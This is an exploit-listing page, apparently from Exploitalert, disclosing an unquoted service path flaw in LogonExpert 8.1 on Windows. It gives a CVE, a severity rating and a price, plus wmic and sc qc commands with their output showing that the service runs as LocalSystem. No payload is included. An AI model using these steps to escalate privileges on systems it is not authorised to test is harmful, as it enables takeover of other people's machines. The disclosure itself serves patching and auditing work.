Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-44490 | CWE-426 | $5,000 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
b1ack_m0nk | High | Local | 2021-02-25 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.185012 | 5.89749 |
# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path # Discovery by: Victor Mondragn # Discovery Date: 23-02-2021 # Vendor Homepage: https://www.softros.com/ # Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi # Tested Version: 8.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 Service Pack 1 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto C:\>sc qc LogonExpertSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LogonExpertSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe LOAD_ORDER_GROUP : LogonExpertGroup TAG : 0 DISPLAY_NAME : LogonExpert Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.